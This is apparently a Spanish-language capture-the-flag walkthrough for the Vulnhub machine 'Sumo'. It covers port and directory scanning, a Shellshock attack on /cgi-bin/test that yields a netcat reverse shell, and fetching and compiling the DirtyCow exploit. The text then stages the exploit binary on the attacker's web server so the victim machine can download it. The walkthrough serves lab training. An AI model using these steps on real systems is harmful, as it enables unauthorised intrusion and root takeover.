Hoy vamos a hackear la maquina de Vulnhub llamada
Sumo. Podeis descargarla desde el siguiente enlace:
Sumo
Video
Enumeration
Empezamos con un nmap para ver que puertos
tiene abiertos.
sml@Cassandra:~$ nmap -A -p- 192.168.1.104
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-16 12:18 CEST
Nmap scan report for ubuntu.home (192.168.1.104)
Host is up (0.00026s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol
2.0)
| ssh-hostkey:
| 1024 06:cb:9e:a3:af:f0:10:48:c4:17:93:4a:2c:45:d9:48 (DSA)
| 2048 b7:c5:42:7b:ba:ae:9b:9b:71:90:e7:47:b4:a4:de:5a (RSA)
|_ 256 fa:81:cd:00:2d:52:66:0b:70:fc:b8:40:fa:db:18:30 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.88 seconds
Vamos a ver si encontramos algo en el puerto 80...
En el primer escaneo, usando el siguiente comando:
dirb http://192.168.1.104/cgi-bin /usr/share/wordlists/dirb/big.txt
Nos ha aparecido el directorio /cgi-bin, asi que
vamos a ver si vemos algo mas dentro...
sml@Cassandra:~$ dirb http://192.168.1.104/cgi-bin
/usr/share/wordlists/dirb/big.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat May 16 12:44:01 2020
URL_BASE: http://192.168.1.104/cgi-bin/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
-----------------
GENERATED WORDS: 20458
---- Scanning URL: http://192.168.1.104/cgi-bin/ ----
+ http://192.168.1.104/cgi-bin/test (CODE:200|SIZE:14)
---------------
END_TIME: Sat May 16 12:44:14 2020
DOWNLOADED: 20458 - FOUND: 1
Encontramos /cgi-bin/test... La VM parece estar muy anticuada
asi que vamos a probar con shellshock.
sml@Cassandra:~$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.1.148] from (UNKNOWN) [192.168.1.104] 40918
bash: no job control in this shell
www-data@ubuntu:/usr/lib/cgi-bin$
www-data@ubuntu:/usr/lib/cgi-bin$ python -c 'import pty; pty.spawn("/bin/sh")'
Privilege Escalation
Una vez dentro, vemos que el sistema tiene un kernel bastante antiguo
asi que probamos con el exploit dirtycow.
https://gist.githubusercontent.com/KrE80r/42f8629577db95782d5e4f609f437a54/raw/7
1c902f55c09aa8ced351690e1e627363c231b45/c0w.c
Lo descargamos y compilamos en nuestra maquina!
sml@Cassandra:~$ wget
https://gist.githubusercontent.com/KrE80r/42f8629577db95782d5e4f609f437a54/raw/7
1c902f55c09aa8ced351690e1e627363c231b45/c0w.c
--2020-05-17 15:48:15--
https://gist.githubusercontent.com/KrE80r/42f8629577db95782d5e4f609f437a54/raw/7
1c902f55c09aa8ced351690e1e627363c231b45/c0w.c
Resolviendo gist.githubusercontent.com (gist.githubusercontent.com)...
151.101.132.133
Conectando con gist.githubusercontent.com
(gist.githubusercontent.com)[151.101.132.133]:443... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 4368 (4,3K) [text/plain]
Grabando a: “c0w.câ€
c0w.c 100%[======================>] 4,27K --.-KB/s en 0s
2020-05-17 15:48:16 (25,2 MB/s) - “c0w.c†guardado [4368/4368]
sml@Cassandra:~$ gcc -pthread c0w.c -o c0w
c0w.c: In function ‘main’:
c0w.c:103:3: warning: implicit declaration of function ‘asprintf’; did you
mean ‘vsprintf’? [-Wimplicit-function-declaration]
103 | asprintf(&backup, "cp %s /tmp/bak", suid_binary);
| ^~~~~~~~
| vsprintf
c0w.c:104:3: warning: implicit declaration of function ‘system’
[-Wimplicit-function-declaration]
104 | system(backup);
| ^~~~~~
sml@Cassandra:~$ cp c0w /var/www/html
Una vez compilado, ponemos el binario en nuestro servidor web
para poder descargarlo desde la maquina "victima".
